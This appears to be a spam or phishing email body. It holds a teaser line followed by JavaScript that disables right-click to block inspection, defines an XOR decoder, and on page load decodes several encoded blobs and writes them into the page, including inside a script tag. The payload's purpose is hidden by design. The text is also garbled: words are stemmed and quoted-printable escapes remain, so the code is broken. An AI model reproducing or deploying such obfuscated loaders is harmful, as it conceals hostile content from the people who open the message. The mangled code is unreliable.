i can't wait anymor!





if (window.event) // onli netscap will have the capit e.
  document.captureev(event.mouseup); // catch the mous up event
function nocontextmenu()  // thi function onli appli to ie4, ignor ot=
herwis.
{
	event.cancelbubbl =3d true;
	event.returnvalu =3d fals;

	return fals;
}
function norightclick(e)	// thi function is us by all other
{
	if (window.event)	// again, ie or nav?
	{
		if (e.which =3d=3d 2 || e.which =3d=3d 3)
			return fals;
	}
	els
		if (event.button =3d=3d 2 || event.button =3d=3d 3)
		{
			event.cancelbubbl =3d true
			event.returnvalu =3d fals;
			return fals;
		}
	
}

document.oncontextmenu =3d nocontextmenu;		// for ie5+
document.onmousedown =3d norightclick;		// for all other


var char_escap=3d"%ff%fe%fd%fc%fb%fa%f9%f8%f7%f6%f5%f4%f3%f2%f1%f0%ef%ee=
%ed%ec%eb%ea%e9%e8%e7%e6%e5%e4%e3%e2%e1%e0%df%de%dd%dc%db%da%d9%d8%d7%d6%d=
5%d4%d3%d2%d1%d0%cf%ce%cd%cc%cb%ca%c9%c8%c7%c6%c5%c4%c3%c2%c1%c0%bf%be%bd%=
bc%bb%ba%b9%b8%b7%b6%b5%b4%b3%b2%b1%b0%af%ae%ad%ac%ab%aa%a9%a8%a7%a6%a5%a4=
%a3%a2%a1%a0%9f%9e%9d%9c%9b%9a%99%98%97%96%95%94%93%92%91%90%8f%8e%8d%8c%8=
b%8a%89%88%87%86%85%84%83%82%81%80%7f%7e%7d%7c%7b%7a%79%78%77%76%75%74%73%=
72%71%70%6f%6e%6d%6c%6b%6a%69%68%67%66%65%64%63%62%61%60%5f%5e%5d%5c%5b%5a=
%59%58%57%56%55%54%53%52%51%50%4f%4e%4d%4c%4b%4a%49%48%47%46%45%44%43%42%4=
1%40%3f%3e%3d%3c%3b%3a%39%38%37%36%35%34%33%32%31%30%2f%2e%2d%2c%2b%2a%29%=
28%27%26%25%24%23%22%21%20%1f%1e%1d%1c%1b%1a%19%18%17%16%15%14%13%12%11%10=
%0f%0e%0d%0c%0b%0a%09%08%07%06%05%04%03%02%01%00";
var char_all    =3d unescap( char_escap );

function bound( min_val, valu, max_val )
{    if( valu < min_val ) {       valu =3d min_val;   }
   if( valu > max_val ) {       valu =3d max_val;    }
   return valu;
}

function aton( string, index )
{  
   index =3d bound( 0, index, string.length-1 );
   return char_all.indexof( string.charat( index ), 0 );
}

function ntoa( index )
{  // convert a number to a charact.  the rang is 0x00 to 0xff inclusiv=
e.
   // revis 1.00, becd.
   index =3d bound( 0, index, 0xff );
   return char_all.charat( index );
}

function xor( data, pattern )
{ 
   var ii =3d 0;    var jj =3d 0;  var result =3d "";  if( pattern =3d=3d =
null || pattern =3d=3d "" || pattern.length <=3d 0 ) {       pattern =3d "=
simpl_xor_pattern";    }
   for( ii =3d 0; ii < data.length; ii++ ) {
      if( jj >=3d pattern.length ) {
         jj =3d 0;
      }
      result +=3d ntoa( aton( data, ii ) ^ aton( pattern, jj++ ));
   }
   return result;
}
function dede( data, pattern ) {    return xor( unescap( data ), pattern =
); }
// -->



function go()
{
var tt=3d"";

tt=3ddede('%aa%b8%a9%a5%ba%a4%a1%a3%ec%aa%a8%a1%a1%e5%e7%ed%b7%ed%b0%af%a0=
%a9%a1%ba%e2%a2%b7%a3%a0%e5%e9%a5%b8%b9%b7%fc%e1%e2%ff%f4%f4%e3%f2%e8%ff%f=
9%fd%e3%fe%fe%f5%e1%e2%ed%e9%9e%ad%a0%b7%aa%ab%ea%e2%ed%eb%b9%a8%a9%a2%af%=
af%bf%f1%a3%a8%ea%a2%a2%ad%ac%b8%a4%a8%a8%f3%a3%a1%e1%a8%a4%b5%a3%ad%b9%a1=
%bf%a5%a8%b4%fb%a0%a2%e2%be%b8%ac%b3%b3%bd%f0%a0%a2%e0%a0%a2%a8%bb%af%af%b=
f%f1%a3%a8%ea%bd%ae%bc%a2%a0%a1%a5%a7%bc%be%f3%b4%a9%be%eb%b4%ab%be%a7%b7%=
ad%af%ab%a3%f3%a3%a1%e1%af%a2%b7%bf%a6%a4%bd%b9%a3%bf%be%fb%a0%a2%e2%ab%b9=
%a1%ab%b5%ad%bf%ab%a8%a2%ea%ee%fd%b3','32891212');

document.write("<script>");
document.write(tt);
document.write('<');
document.write('\u002f');
document.write('script');
document.write('>');

tt=3ddede('%f0%9f%89%8e%84%8f%ec%bc%a1%a8%bc%a2%f1%fc%fd%e9%e8%ab%a0%a2%af=
%a2%f5%a9%a9%a5%bc%a9%ba%ea%ae%a4%ba%a8%ad%b8%f1%fb%f6%f0%9c%88%83%8f%91%f=
2%f4%9e%9e%f5%f4%98%8c%f4%f0%8f%81%9a%e8%ab%a0%a2%af%a2%f5%a9%a9%a5%bc%a9%=
ba%f4%f0%89%f6%f0%8e%85%82%9f%e8%aa%a9%a9%a9%f6%89%be%a1%ab%a0%eb%ab%a3%a4=
%a5%be%f6%eb%f4%f8%fa%fc%f3%f8%ec%bb%a3%b6%ae%f5%f9%f6%82%8d%99%8c%8f%87%9=
8%89%eb%9b%89%90%ea%9b%8e%8d%87%84%b3%f0%e4%8e%83%86%9e%f2%f7%e7%8e%f6%ea%=
f0%e4%8c%85%9e%f4%f0%e4%9c%88%f6%f6%e3%9f%9a%f2%f4%e5%98%89%87%88%91%f4%f0=
%e4%9c%8d%8a%86%89%f5','347375');
document.write(tt);
tt=3ddede('%f0%9f%89%8e%84%8f%ec%a8%ad%a0%a4%99%bc%aa%ab%a5%a6%ad%f1%fb%e8=
%af%ad%a6%a0%9b%a9%a8%ac%a3%a2%ac%f5%fd%e8%bd%a5%af%bc%a4%f5%f9%fb%fb%e8%a=
d%a4%a3%ab%a5%f5%af%ad%a4%b8%ae%ba%ec%aa%a5%be%af%ad%be%f5%fa%f2%f7%9c%8e%=
87%8e%95%f5%f4%98%9a%f4%f0%9f%8c%ec%bf%a3%a8%bf%a0%f1%f9%fa%fc%ee%e8%ae%af=
%89%a3%a7%a7%be%f5%a8%a0%aa%ab%a7%f6%f6%98%8a%8a%80%8d%ea%af%ae%a4%a0%9b%b=
a%ad%a8%a1%a2%af%f7%fc%eb%ab%a9%a4%a6%9c%aa%ac%a8%a1%a4%ab%f6%fd%ec%bf%a3%=
a8%bf%a0%f1%ea%fb%fc%fb%ed%ee%e8%a8%a3%b9%ac%a9%ba%f7%fc%f5%f4%98%8a%85%88=
%92%f6%f0%9c%98%f2','347375');
document.write(tt);
tt=3ddede('%f0%9f%8c%ec%be%8b%a0%a2%af%a2%f5%be%a3%bb%e8%ad%a4%a3%ab%a5%f5=
%a0%ad%ac%b8%eb%bf%a5%ac%be%a4%f6%ea%fd%f8%fa%e9%e9%e8%ae%af%89%a3%a7%a7%b=
e%f5%e9%af%a8%ab%af%ae%ac%f2%f7%98%ec%a9%a6%a5%ac%a6%f1%ab%af%a2%bf%ad%be%=
f6%f6%8f%8e%86%98%8d%98%f2%f7%8e%83%86%9e%ec%ad%a9%af%ad%f7%ad%b9%a1%ad%a4=
%ea%bf%a2%b2%a9%f5%f8%f2%f7%8a%f2%a4%a3%ba%ae%e8%aa%ad%af%a8%b8%e8%aa%ba%a=
5%a1%eb%bf%a9%aa%a9%ad%a6%bb%ec%a9%be%ec%a3%a7%a1%ad%f6%e3%89%f6%e2%e8%82%=
ad%b9%ac%af%a7%b8%a9%b8%ad%b4%e8%a3%bf%eb%bc%a4%ad%ea%ae%a2%af%ab%ad%b9%b8=
%eb%ad%be%a7%be%a5%a8%e8%bb%ad%a8%af%aa%a5%ec%ab%a5%a1%a6%bd%a2%a1%be%b5%e=
b%a1%a2%e8%be%a4%ae%e8%bb%a7%b8%a0%af%e9','347375');
document.write(tt);
tt=3ddede('%8f%be%a5%ec%bb%af%a9%eb%af%a5%ba%a6%bf%eb%ae%be%a7%a7%ec%aa%a4=
%a0%e8%a5%ba%ae%ba%ec%bc%a2%a9%eb%bf%a3%ba%a6%a8%e5%e8%f0%8a%f4%81%8a%83%8=
9%e8%b3%83%9e%9a%ec%8c%98%89%8a%85%9f%e8%88%89%88%87%81%8d%ea%9e%8e%89%80%=
81%9e%b5%e5%e6%e2%e6%e4%ec%87%81%9a%8d%eb%f0%e4%8a%f2%e8%af%ba%ae%ba%b5%e8=
%ae%ad%b2%e8%bb%ad%ea%a4%aa%be%a9%e8%a4%a9%bc%e8%bf%ad%a4%a8%ae%ba%bf%e8%a=
5%a2%a7%a1%a2%ad%ea%e2%e5%e6%af%bd%a7%ec%a2%a6%b8%a7%ea%b8%a3%ad%ec%bf%a5%=
be%a7%ac%ec%a7%ac%ec%f7%8a%f2%84%83%9a%8e%e8%89%9a%85%98%82%8b%ed%e9%eb%ed=
%f7%8a%9e%f6%f6%e3%89%f6%f0%e7%8c%83%85%9c%f2%f4%e5%8f%8e%86%98%8d%98%f2%f=
7%98%ec%a9%a6%a5%ac%a6%f1%ab%af%a2%bf%ad%be%f6%f6%8e%99%f6','347375');
document.write(tt);
tt=3ddede('%f0%8d%87%82%9c%ea%aa%aa%ab%a9%f5%e8%9a%ae%ba%a8%a9%a4%ad%e7%e8=
%8d%ba%a3%ad%a7%e4%ec%80%af%a0%bd%ad%b8%a1%a9%ad%e7%e8%bf%a9%a4%bf%e6%bb%a=
9%ba%a3%aa%e9%e8%bf%a1%b0%a9%f6%fc%f2%f4%88%f2%f9%fc%e3%ff%ea%8a%99%8d%89%=
e8%99%89%93%e8%9f%80%85%9b%ea%f4%e3%8a%f4%f0%e4%8e%83%86%9e%f2%f7%8a%9e%f6=
%f6%98%8a%8a%80%8d%ea%af%ae%a4%a0%9b%ba%ad%a8%a1%a2%af%f7%fc%eb%ab%a9%a4%a=
6%9c%aa%ac%a8%a1%a4%ab%f6%fd%ec%bf%a3%a8%bf%a0%f1%ea%fb%fc%fb%ed%ee%e8%a8%=
a3%b9%ac%a9%ba%f7%fc%f5%f4%98%8a%85%88%92%f6%f0%9c%98%f2%f7%9c%88%e8%ab%a0=
%a2%af%a2%f5%a7%a5%af%ac%a0%ad%f4%f0%82%85%8b%e8%a2%a9%a2%af%a4%bc%f7%f9%f=
d%e8%ad%a4%be%f1%e9%ea%ec%bb%b8%af%f6%ea%a4%bc%be%bc%f1%e7%e3%bf%bd%bb%e5%=
a4%a3%a4%a3%b8%aa%a4%e2%ab%a5%a1%e4%a1%a1%a9%ad%a9%b8%e7%aa%bb%a1%fd%fd%e6=
%a6%b8%ad%ee','347375');
document.write(tt);
tt=3ddede('%ec%bc%a1%a8%bc%a2%f1%fc%f0%ec%aa%a5%be%af%ad%be%f5%fb%f2%f7%89=
%ec%a0%b8%a9%ad%f5%ee%a0%be%b8%bb%f2%e3%e7%bd%bb%bc%e6%ba%a1%b9%a5%bf%e5%b=
4%e6%a4%a9%bf%e7%ee%f6%f6%ed%e6%e5%f0%aa%b8%f2%f7%ae%a3%a6%be%ec%ad%a9%af%=
ad%f7%ad%b9%a1%ad%a4%ea%bf%a2%b2%a9%f5%e7%fe%f5%9c%a9%ad%a4%bf%f7%e7%ad%f6=
%e7%e1%f5%f4%e3%89%f4%f0%e4%9c%88%f6%f6%98%8f%e8%ad%a4%a3%ab%a5%f5%a1%a1%a=
e%a8%a7%ad%f2%f4%83%81%8c%e8%a4%ad%a3%ab%a3%bc%f1%fd%fc%ec%aa%a4%b8%f5%e8%=
ee%eb%bb%be%ab%f7%ee%a3%bc%b8%b8%f0%e3%e4%bf%bb%bf%e4%a0%a4%a4%a5%bc%ab%a0=
%e5%ab%a3%a5%e5%a5%a6%a9%ab%ad%b9%e3%ad%bb%a7%f9%ff%e2%a1%b8%ab%ea%ea%bb%a=
2%ac%b8%a0%f7%fb%f3%e8%ae%a7%b8%a8%ae%ba%f1%f9%f4%f0%8a%e8%a4%ba%af%aa%f6%=
ea%a4%bc%be%bc%f1%e7%e3%bf%bd%bb%e5%be%a5%bb%a3%b8%e6%b0%e2%a6%af%b8%e4%ea=
%f2%f4%eb%e1%e6%f4%ae%ba%f4','347375');
document.write(tt);
tt=3ddede('%f0%ad%a7%a2%bc%ea%aa%aa%ab%a9%f5%ab%be%a2%a9%a0%e8%b9%a5%b1%ad=
%f1%e5%f8%f2%88%bd%a1%bb%a2%a3%bf%bb%f0%e7%ab%f2%e6%e5%f2%f4%e5%8d%f5%f4%e=
3%9c%8e%f2%f7%9c%88%e8%ab%a0%a2%af%a2%f5%a7%a5%af%ac%a0%ad%f4%f0%82%85%8b%=
e8%a2%a9%a2%af%a4%bc%f7%f9%fd%e8%ad%a4%be%f1%e9%ea%ec%bb%b8%af%f6%ea%a4%bc=
%be%bc%f1%e7%e3%bf%bd%bb%e5%a4%a3%a4%a3%b8%aa%a4%e2%ab%a5%a1%e4%a1%a1%a9%a=
d%a9%b8%e7%aa%bb%a1%fd%f2%e6%a6%b8%ad%ee%eb%bf%a5%ac%be%a4%f6%ff%f4%e8%a8%=
a3%b9%ac%a9%ba%f7%fd%f5%f4%8d%e8%a2%be%ae%ae%f1%ea%a2%b8%bf%b8%f6%e7%e5%bb=
%bc%bf%e2%be%a3%bf%a2%bc%e1%b0%e4%a2%ae%bc%e3%ea%f4%f0%ea%e5%e1%f4%a8%be%f=
5%f4%aa%a7%a4%b8%eb%ae%ad%ab%af%f1%aa%ba%a5%a9%a6%ec%b8%a1%b6%ad%f7%e1%f9%=
f6%8e%a1%ad%8e%a4%a7%ae%bb%f6%e3%aa%f6%e1%e5%f4%f0%e4%89%f2%f4%e5%98%8f%f6=
%f0%e7%9e%9e%f5%f4%e3%9c%88%83%8f%91%f2%f4%e5%98%8a%8a%80%8d%f4','347375')=
;
document.write(tt);
tt=3ddede('%f0%9f%89%8e%84%8f%ec%bc%a1%a8%bc%a2%f1%e9%ff%f9%ed%e8%ec%aa%a4=
%a5%af%a4%f1%a8%ad%a2%bc%af%be%eb%aa%a3%ba%ae%a9%b9%f5%fc%f6%f6%98%89%87%8=
8%91%f4%f0%9f%9a%f2%f4%9e%88%f5%f4%8a%87%98%81%f5%f4%85%86%9a%99%9f%e8%a3%=
a6%a9%a0%a2%ab%a7%f5%e8%ab%a4%af%a3%e0%e3%f7%e9%e8%b8%b1%ba%a9%f6%aa%b9%bc=
%be%a3%a5%e8%ba%a9%a6%b9%ae%f5%ee%8b%a6%a5%a8%a3%ec%a0%af%be%ae%e8%b8%a7%e=
a%ad%a8%ab%a9%bb%b9%ec%a4%bd%be%e8%b9%a5%bf%ad%ee%e8%a4%ad%a6%ad%f1%8a%9f%=
98%9f%87%82%e8%a5%a2%a7%a1%af%a3%f7%ee%ac%a7%e4%e1%e8%f2%eb%f4%e3%8e%85%9e=
%86%f6%f0%e7%9e%88%f5%f4%e3%9c%98%f2%f7%e7%98%8a%85%88%92%f6%f0%e7%9e%8d%8=
9%84%89%f6%f6%88%82%9e%ec%a9%a6%a5%ac%a6%f1%ab%af%a2%bf%ad%be%f6%f6%8e%99%=
f6%f0%e7%8e%85%9d%f6%f0%e7%9e%88%f5%f4%e3%9c%98%f2%f7%e7%98%8a%85%88%92%f6=
%f0%e7%9e%8d%89%84%89%f6%f6%e3%9f%8c%f2%f4%e5%98%99%f6%f0%e7%9e%8e%84%8c%9=
5%f6%f6%e3%9f%89%8e%84%8f%f2','347375');
document.write(tt);
}
// -->









go();



